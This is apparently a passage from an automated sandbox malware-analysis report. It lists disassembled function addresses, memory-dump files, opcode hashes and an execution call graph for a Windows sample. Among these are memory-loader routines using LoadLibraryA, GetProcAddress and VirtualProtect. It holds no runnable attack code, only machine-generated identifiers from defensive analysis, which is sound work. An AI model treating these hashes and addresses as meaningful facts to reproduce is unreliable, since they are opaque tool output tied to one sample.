                                                                                                                                                                      • Instruction Fuzzy Hash: 9D2165B2A2CA8691FB20DB11F4516EA63A4FF847C4F805136E68D87B69DF3CD215DB00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313DFE30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                      • Opcode ID: 2743ad350869e21c422f749301da5554f395f0d0fe1937856bf46b82881aa8c6
                                                                                                                                                                      • Instruction ID: fc566ed4ad416242e8007dffff6c97d3b7a1f863061701ab7f6acb44e1a5e16c
                                                                                                                                                                      • Opcode Fuzzy Hash: 2743ad350869e21c422f749301da5554f395f0d0fe1937856bf46b82881aa8c6
                                                                                                                                                                      • Instruction Fuzzy Hash: AB115B32A18B4582EB608B15E45026977E4FF88F84F584231DECC47B59DF3CC5519B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F02CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: :
                                                                                                                                                                      • API String ID: 2595371189-336475711
                                                                                                                                                                      • Opcode ID: 5067e1b2263128f29cfa21414fa1e963a58bf13dbeb460b59c80c356ce3c83bf
                                                                                                                                                                      • Instruction ID: 9f0aa2f1703540cd7e1b7650561774b48d6a1938b512a7361f0fad9f12a11bfe
                                                                                                                                                                      • Opcode Fuzzy Hash: 5067e1b2263128f29cfa21414fa1e963a58bf13dbeb460b59c80c356ce3c83bf
                                                                                                                                                                      • Instruction Fuzzy Hash: D6018F62D1C206C6FB60AF6494612BF63E0EF44708F801036D59DC6795DF3CE504EB14
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:1.3%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:2.9%
                                                                                                                                                                      Total number of Nodes:339
                                                                                                                                                                      Total number of Limit Nodes:42
                                                                                                                                                                      execution_graph 85247 7ffe0032ffe0 85248 7ffe0032fff0 85247->85248 85249 7ffe00330000 85248->85249 85253 7ffe00311e01 85248->85253 85257 7ffe0036ec4c 85248->85257 85261 7ffe003114bf 85248->85261 85253->85249 85254 7ffe0036e680 85253->85254 85255 7ffe0036ed9f SetLastError 85254->85255 85256 7ffe0036edb3 85254->85256 85255->85256 85256->85249 85258 7ffe0036ed60 85257->85258 85259 7ffe0036ed9f SetLastError 85258->85259 85260 7ffe0036edb3 85258->85260 85259->85260 85260->85249 85261->85249 85262 7ffe0036e560 85261->85262 85263 7ffe0036ed9f SetLastError 85262->85263 85264 7ffe0036edb3 85262->85264 85263->85264 85264->85249 85644 7ffe00338350 85646 7ffe0033836a 85644->85646 85645 7ffe00338380 85646->85645 85648 7ffe00311131 85646->85648 85648->85645 85649 7ffe0031f3c0 85648->85649 85652 7ffe0031f3f0 85649->85652 85651 7ffe0031f3da 85651->85645 85653 7ffe0031132a 85652->85653 85654 7ffe0031f410 SetLastError 85653->85654 85655 7ffe0031f430 85654->85655 85657 7ffe00311c1c 8 API calls 85655->85657 85656 7ffe0031f46b 85656->85651 85657->85656 85265 7ffdff211df0 85266 7ffdff211e7e 85265->85266 85271 7ffdff211e28 85265->85271 85267 7ffdff211ea0 85266->85267 85266->85271 85268 7ffdff211e40 85267->85268 85275 7ffdff211ea5 85267->85275 85310 7ffdff198e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85268->85310 85309 7ffdff198e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85271->85309 85272 7ffdff211e6a 85274 7ffdff211f9d 85275->85274 85277 7ffdff211850 00007FFE1A4519C0 85275->85277 85311 7ffdff1f7cb0 6 API calls 85275->85311 85278 7ffdff21192b 85277->85278 85294 7ffdff211949 85277->85294 85330 7ffdff199d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85278->85330 85281 7ffdff211afd 85312 7ffdff24b410 85281->85312 85283 7ffdff211dc6 85349 7ffdff2bcad0 85283->85349 85284 7ffdff211a6d 85287 7ffdff211a9e 85284->85287 85288 7ffdff211a76 85284->85288 85285 7ffdff211a37 85285->85281 85285->85284 85292 7ffdff211ad6 85287->85292 85333 7ffdff195d80 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind new[] 85287->85333 85332 7ffdff199bc0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85288->85332 85290 7ffdff211dd7 85290->85275 85305 7ffdff211b5f 85292->85305 85334 7ffdff195d80 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind new[] 85292->85334 85293 7ffdff211cee 85303 7ffdff21193c 85293->85303 85347 7ffdff199bc0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85293->85347 85294->85285 85295 7ffdff211a12 85294->85295 85331 7ffdff199bc0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85295->85331 85296 7ffdff211b90 85296->85293 85346 7ffdff1c3930 37 API calls 85296->85346 85298 7ffdff211aaf 85298->85292 85300 7ffdff24b410 5 API calls 85298->85300 85300->85292 85348 7ffdff2115a0 00007FFE1A4519C0 85303->85348 85305->85296 85305->85303 85335 7ffdff1b1fa0 85305->85335 85343 7ffdff196180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85305->85343 85344 7ffdff1ee260 6 API calls 85305->85344 85345 7ffdff1b3300 29 API calls 85305->85345 85309->85268 85310->85272 85311->85275 85315 7ffdff24b461 85312->85315 85314 7ffdff24b76e 85317 7ffdff24b899 85314->85317 85324 7ffdff24b87b 85314->85324 85367 7ffdff198c40 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85314->85367 85315->85314 85318 7ffdff24b824 85315->85318 85356 7ffdff24a840 85315->85356 85320 7ffdff24b93a 85317->85320 85369 7ffdff1ee710 00007FFE1A4519C0 85317->85369 85366 7ffdff199d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85318->85366 85328 7ffdff24b993 85320->85328 85370 7ffdff221520 00007FFE1A4519C0 85320->85370 85322 7ffdff2bcad0 4 API calls 85325 7ffdff24b9dc 85322->85325 85368 7ffdff198e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85324->85368 85325->85292 85327 7ffdff24b961 85327->85328 85371 7ffdff1da920 00007FFE1A4519C0 85327->85371 85328->85322 85330->85303 85331->85303 85332->85303 85333->85298 85334->85305 85340 7ffdff1b1fd7 85335->85340 85336 7ffdff1b2039 85336->85305 85339 7ffdff1b21f5 85339->85336 85388 7ffdff1aa2f0 00007FFE1A4519C0 00007FFE1A4519C0 new[] 85339->85388 85340->85336 85340->85339 85375 7ffdff1b1b80 85340->85375 85386 7ffdff1b1ed0 00007FFE1A4519C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85340->85386 85387 7ffdff1a6150 22 API calls 85340->85387 85343->85305 85344->85305 85345->85305 85346->85293 85347->85303 85348->85283 85351 7ffdff2bcad9 85349->85351 85350 7ffdff2bcb24 IsProcessorFeaturePresent 85353 7ffdff2bcb3c 85350->85353 85351->85350 85352 7ffdff2bcae4 85351->85352 85352->85290 85469 7ffdff2bcd18 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85353->85469 85355 7ffdff2bcb4f 85355->85290 85359 7ffdff24a884 85356->85359 85357 7ffdff24a962 85365 7ffdff24a980 85357->85365 85372 7ffdff247ae0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85357->85372 85358 7ffdff24a9a7 85361 7ffdff24a9ee 85358->85361 85362 7ffdff24a9db 85358->85362 85358->85365 85359->85357 85359->85358 85374 7ffdff199d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85361->85374 85373 7ffdff199d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85362->85373 85365->85315 85366->85314 85367->85324 85368->85317 85370->85327 85371->85328 85372->85365 85373->85365 85374->85365 85389 7ffdff1a8cf0 85375->85389 85378 7ffdff1b1cb4 85378->85340 85379 7ffdff1b1d69 85379->85378 85435 7ffdff1a6150 22 API calls 85379->85435 85383 7ffdff1b1ca4 85383->85378 85383->85379 85434 7ffdff250d00 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85383->85434 85386->85340 85388->85336 85390 7ffdff1a8fb9 85389->85390 85394 7ffdff1a8d20 85389->85394 85391 7ffdff1a905e 85390->85391 85442 7ffdff1ad550 8 API calls 85390->85442 85404 7ffdff1a8d85 85391->85404 85444 7ffdff1a5ba0 00007FFE1A4519C0 85391->85444 85394->85390 85397 7ffdff1a8d8a 85394->85397 85402 7ffdff1a8d7d 85394->85402 85395 7ffdff2bcad0 4 API calls 85396 7ffdff1a90b9 85395->85396 85396->85378 85414 7ffdff1a90d0 85396->85414 85397->85391 85398 7ffdff1a8dc3 85397->85398 85406 7ffdff1a8efa 85397->85406 85410 7ffdff1a8dd5 85397->85410 85437 7ffdff1a5ba0 00007FFE1A4519C0 85398->85437 85399 7ffdff1a901b 85399->85391 85399->85399 85443 7ffdff1a3220 00007FFE1A4519C0 85399->85443 85436 7ffdff1a5ba0 00007FFE1A4519C0 85402->85436 85404->85395 85405 7ffdff1a8ec7 85405->85406 85408 7ffdff1a8ee6 85405->85408 85406->85390 85406->85391 85441 7ffdff1aaa60 00007FFE1A4519C0 85406->85441 85407 7ffdff1a8e84 85407->85405 85407->85408 85439 7ffdff1a69e0 9 API calls 85407->85439 85440 7ffdff1a5ba0 00007FFE1A4519C0 85408->85440 85410->85391 85410->85407 85438 7ffdff250d40 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85410->85438 85415 7ffdff1a90f2 85414->85415 85424 7ffdff1a9125 85414->85424 85451 7ffdff198e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85415->85451 85418 7ffdff1a911e 85418->85378 85418->85379 85418->85383 85433 7ffdff1aaa60 00007FFE1A4519C0 85418->85433 85419 7ffdff1a92a6 85421 7ffdff1a92d4 85419->85421 85425 7ffdff1a92be 85419->85425 85420 7ffdff1a924e 85452 7ffdff198e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85420->85452 85427 7ffdff1a92f0 85421->85427 85429 7ffdff1a91f8 85421->85429 85423 7ffdff1a932b 00007FFE1A4519C0 85423->85418 85424->85418 85424->85419 85424->85420 85424->85429 85445 7ffdff1a6d90 85425->85445 85427->85423 85428 7ffdff1a9313 85427->85428 85454 7ffdff1a2320 00007FFE1A4519C0 00007FFE1A4519C0 new[] 85427->85454 85455 7ffdff1a5850 00007FFE1A4519C0 00007FFE1A4519C0 00007FFE1A4519C0 00007FFE1A4519C0 new[] 85428->85455 85429->85418 85453 7ffdff1a6150 22 API calls 85429->85453 85432 7ffdff1a931d 85432->85423 85433->85383 85434->85379 85436->85404 85437->85404 85438->85407 85439->85405 85440->85404 85441->85390 85442->85399 85443->85391 85444->85404 85446 7ffdff1a6dcc 85445->85446 85447 7ffdff1a6dbf 85445->85447 85449 7ffdff1a6ddc 85446->85449 85456 7ffdff19c960 85446->85456 85466 7ffdff1ad930 6 API calls 85447->85466 85449->85429 85451->85418 85452->85429 85454->85428 85455->85432 85457 7ffdff19c98d 85456->85457 85458 7ffdff19c9a4 85457->85458 85459 7ffdff19ca04 ReadFile 85457->85459 85460 7ffdff19ca9a 85457->85460 85464 7ffdff19ca74 85457->85464 85458->85449 85459->85457 85459->85460 85461 7ffdff19caca 85460->85461 85468 7ffdff198e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85460->85468 85461->85458 85463 7ffdff19cad9 00007FFE1A4519C0 85461->85463 85463->85458 85467 7ffdff19c790 9 API calls 85464->85467 85466->85446 85467->85458 85468->85461 85469->85355 85470 7ffdfb287b30 85471 7ffdfb2886d1 85470->85471 85478 7ffdfb287b48 85470->85478 85472 7ffdfb2885de LoadLibraryA 85473 7ffdfb2885f8 85472->85473 85476 7ffdfb288617 GetProcAddress 85473->85476 85473->85478 85475 7ffdfb288639 VirtualProtect VirtualProtect 85475->85471 85476->85473 85477 7ffdfb28862e 85476->85477 85478->85472 85478->85475 85479 7ffe0037e380 85480 7ffe0037e390 85479->85480 85483 7ffe003124b9 85480->85483 85482 7ffe0037e3c9 85483->85482 85485 7ffe00358170 85483->85485 85484 7ffe003581f6 85484->85482 85485->85484 85487 7ffe003582f7 85485->85487 85489 7ffe00311280 85485->85489 85487->85484 85488 7ffe00311280 SetLastError 85487->85488 85488->85487 85489->85487 85491 7ffe00358a20 85489->85491 85490 7ffe00358a9e SetLastError 85490->85491 85492 7ffe00358aed 85490->85492 85491->85490 85491->85492 85492->85487 85493 7ffe00381360 85494 7ffe00381378 85493->85494 85495 7ffe00381486 85494->85495 85497 7ffe00311c1c 85494->85497 85497->85494 85500 7ffe00356fb0 85497->85500 85499 7ffe00357079 85499->85494 85500->85499 85501 7ffe003114bf SetLastError 85500->85501 85502 7ffe00311e01 SetLastError 85500->85502 85503 7ffe0036ec4c SetLastError 85500->85503 85504 7ffe00311a0f 85500->85504 85501->85500 85502->85500 85503->85500 85504->85500 85505 7ffe0035aaa0 85504->85505 85506 7ffe0035b8aa 00007FFE1FFB6570 85505->85506 85511 7ffe0035ac23 85505->85511 85507 7ffe0035b8cb 00007FFE1FFB6570 85506->85507 85506->85511 85508 7ffe0035b8eb 00007FFE1FFB6570 85507->85508 85507->85511 85509 7ffe0035b902 00007FFE1FFB6570 85508->85509 85508->85511 85510 7ffe0035b91a 00007FFE1FFB6570 85509->85510 85509->85511 85510->85511 85511->85500 85512 7ffe00355dc0 85515 7ffe00355ddf 85512->85515 85513 7ffe00311280 SetLastError 85514 7ffe00355f4e 85513->85514 85515->85513 85515->85514 85658 7ffdff1b0a50 85659 7ffdff1b0a9c 85658->85659 85660 7ffdff1b0aae 00007FFE1FFB5630 85659->85660 85666 7ffdff1b0ac1 new[] 85659->85666 85660->85666 85661 7ffdff2bcad0 4 API calls 85662 7ffdff1b0bef 85661->85662 85664 7ffdff1b0e77 85667 7ffdff1b0ef8 85664->85667 85669 7ffdff19c960 11 API calls 85664->85669 85666->85667 85668 7ffdff1b0bd2 85666->85668 85670 7ffdff1a8290 85666->85670 85667->85668 85678 7ffdff1a79e0 26 API calls 85667->85678 85668->85661 85669->85667 85675 7ffdff1a8321 new[] 85670->85675 85671 7ffdff1a83d2 00007FFE1A4519C0 85673 7ffdff1a843c 85671->85673 85672 7ffdff1a833a new[] 85672->85671 85676 7ffdff1a85b3 85672->85676 85673->85676 85679 7ffdff19ef40 85673->85679 85675->85672 85675->85676 85693 7ffdff250d40 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85675->85693 85676->85664 85678->85668 85687 7ffdff19ef91 85679->85687 85682 7ffdff2bcad0 4 API calls 85683 7ffdff19f5bf 85682->85683 85683->85676 85684 7ffdff19f160 CreateFileW 85684->85687 85687->85684 85688 7ffdff19f3e5 85687->85688 85691 7ffdff19f318 85687->85691 85694 7ffdff19bfd0 85687->85694 85698 7ffdff19e980 11 API calls new[] 85687->85698 85699 7ffdff19f7a0 10 API calls 85687->85699 85700 7ffdff198e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85687->85700 85701 7ffdff19c790 9 API calls 85688->85701 85690 7ffdff19f410 85702 7ffdff250d40 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85690->85702 85691->85682 85693->85672 85696 7ffdff19c00e new[] 85694->85696 85695 7ffdff19c057 85695->85687 85696->85695 85697 7ffdff19c02b 00007FFE1A4519C0 85696->85697 85697->85695 85698->85687 85699->85687 85700->85687 85701->85690 85702->85691 85516 7ffdff1a0180 GetSystemInfo 85517 7ffdff1a01b4 85516->85517 85518 7ffdfb899f90 85519 7ffdfb899fa8 85518->85519 85524 7ffdfb89ab86 85518->85524 85520 7ffdfb89aa93 LoadLibraryA 85519->85520 85523 7ffdfb89aaee VirtualProtect VirtualProtect 85519->85523 85521 7ffdfb89aaad 85520->85521 85521->85519 85525 7ffdfb89aacc GetProcAddress 85521->85525 85523->85524 85524->85524 85525->85521 85526 7ffdfb89aae3 85525->85526 85527 7ffdff1edd00 85528 7ffdff1edd2c 85527->85528 85531 7ffdff1edd31 85527->85531 85540 7ffdff211540 85528->85540 85530 7ffdff1ede2a 85532 7ffdff1ede86 85530->85532 85533 7ffdff1ede70 85530->85533 85536 7ffdff1ede2e 85530->85536 85531->85530 85531->85536 85539 7ffdff1ede17 85531->85539 85544 7ffdff229ec0 5 API calls new[] 85531->85544 85547 7ffdff199d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85532->85547 85546 7ffdff199d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85533->85546 85539->85530 85545 7ffdff22bcd0 5 API calls new[] 85539->85545 85541 7ffdff211559 85540->85541 85543 7ffdff211565 85540->85543 85548 7ffdff211470 85541->85548 85543->85531 85544->85539 85545->85530 85546->85536 85547->85536 85549 7ffdff2114aa 85548->85549 85553 7ffdff2114b7 85548->85553 85554 7ffdff210fb0 85549->85554 85551 7ffdff21150d 85551->85543 85552 7ffdff210fb0 43 API calls 85552->85553 85553->85551 85553->85552 85584 7ffdff210cb0 85554->85584 85556 7ffdff211097 85561 7ffdff2bcad0 4 API calls 85556->85561 85557 7ffdff21142f 85624 7ffdff1ee260 6 API calls 85557->85624 85559 7ffdff21106c 85559->85556 85562 7ffdff1b1fa0 31 API calls 85559->85562 85566 7ffdff211148 85559->85566 85569 7ffdff211117 85559->85569 85563 7ffdff21144f 85561->85563 85564 7ffdff2110e1 85562->85564 85563->85553 85565 7ffdff2110e7 85564->85565 85564->85566 85565->85569 85615 7ffdff195d80 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind new[] 85565->85615 85568 7ffdff2111f8 85566->85568 85570 7ffdff2111b6 85566->85570 85616 7ffdff195d80 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind new[] 85568->85616 85569->85556 85569->85557 85623 7ffdff196180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85569->85623 85572 7ffdff2112d1 85570->85572 85573 7ffdff211317 85570->85573 85577 7ffdff2111db 85570->85577 85617 7ffdff195d80 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind new[] 85572->85617 85618 7ffdff198c40 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85573->85618 85576 7ffdff21134f 85619 7ffdff209a70 43 API calls new[] 85576->85619 85577->85569 85622 7ffdff1b3300 29 API calls 85577->85622 85580 7ffdff21137b 85581 7ffdff2113a9 85580->85581 85620 7ffdff1eb380 43 API calls 85580->85620 85581->85577 85621 7ffdff1ee2f0 6 API calls 85581->85621 85585 7ffdff210cd2 85584->85585 85607 7ffdff210f63 85584->85607 85586 7ffdff210cdb 85585->85586 85590 7ffdff210cf3 85585->85590 85625 7ffdff210ba0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85586->85625 85588 7ffdff210ce6 85588->85559 85591 7ffdff210d32 85590->85591 85596 7ffdff210edd 85590->85596 85592 7ffdff210d84 85591->85592 85626 7ffdff210ba0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85591->85626 85594 7ffdff211850 42 API calls 85592->85594 85598 7ffdff210dc0 85594->85598 85595 7ffdff210df1 85597 7ffdff210e36 85595->85597 85604 7ffdff210e7c 85595->85604 85595->85607 85596->85607 85634 7ffdff210ba0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85596->85634 85630 7ffdff198e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85597->85630 85598->85595 85600 7ffdff210df3 85598->85600 85601 7ffdff210de9 85598->85601 85600->85595 85628 7ffdff24f130 00007FFE1A4519C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85600->85628 85627 7ffdff196180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85601->85627 85602 7ffdff210e45 85631 7ffdff198e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85602->85631 85632 7ffdff1c3930 37 API calls 85604->85632 85607->85559 85609 7ffdff210e6d 85609->85559 85610 7ffdff210e04 85629 7ffdff210ba0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85610->85629 85612 7ffdff210ea8 85633 7ffdff24d880 29 API calls 85612->85633 85614 7ffdff210ece 85614->85559 85615->85569 85616->85577 85617->85577 85618->85576 85619->85580 85620->85581 85621->85577 85622->85569 85623->85557 85624->85556 85625->85588 85626->85592 85627->85595 85628->85610 85629->85595 85630->85602 85631->85609 85632->85612 85633->85614 85634->85607

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FFE00311A0F Relevance: 23.6, APIs: 5, Strings: 8, Instructions: 891COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
                                                                                                                                                                      • API String ID: 0-2781224710
                                                                                                                                                                      • Opcode ID: 5127ec984dcdca13ee2ae5df52fccc4828cd11522177691d3ca0826426f12d1e
                                                                                                                                                                      • Instruction ID: 909955307cf6f37b448b1ce23f16aa9e1761966cfbd7353976f107479a47598f
                                                                                                                                                                      • Opcode Fuzzy Hash: 5127ec984dcdca13ee2ae5df52fccc4828cd11522177691d3ca0826426f12d1e
                                                                                                                                                                      • Instruction Fuzzy Hash: 5492A931A18A8282FB62EB21D8507BAA7A0EF45B85F54403ADB4D477BEDF3CE5458311
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFB899F90 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 893librarymemoryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2039915021.00007FFDFB899000.00000080.00000001.01000000.00000005.sdmp, Offset: 00007FFDFB2C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039158277.00007FFDFB2C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2039190548.00007FFDFB2C1000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2039190548.00007FFDFB55A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2039190548.00007FFDFB616000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2039190548.00007FFDFB63B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2039190548.00007FFDFB6D5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2039190548.00007FFDFB6D8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2039190548.00007FFDFB7E0000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2039190548.00007FFDFB821000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2039190548.00007FFDFB82B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2039190548.00007FFDFB88D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2039946476.00007FFDFB89B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2c0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                      • String ID: 2v]
                                                                                                                                                                      • API String ID: 3300690313-3021020117
                                                                                                                                                                      • Opcode ID: 9bddde282dbbdb65e7b91acdafd26197c66bfe7ae65582efb0e6c09338b35502
                                                                                                                                                                      • Instruction ID: 26864de990cf09db15bd3f5af167db6c7cfdf131b7620edd5896f79222679765
                                                                                                                                                                      • Opcode Fuzzy Hash: 9bddde282dbbdb65e7b91acdafd26197c66bfe7ae65582efb0e6c09338b35502
                                                                                                                                                                      • Instruction Fuzzy Hash: 6462082272919386EB198F38D51467D7BD0F788B89F045532EAAEC37D8EA3CE945C700
                                                                                                                                                                      Uniqueness

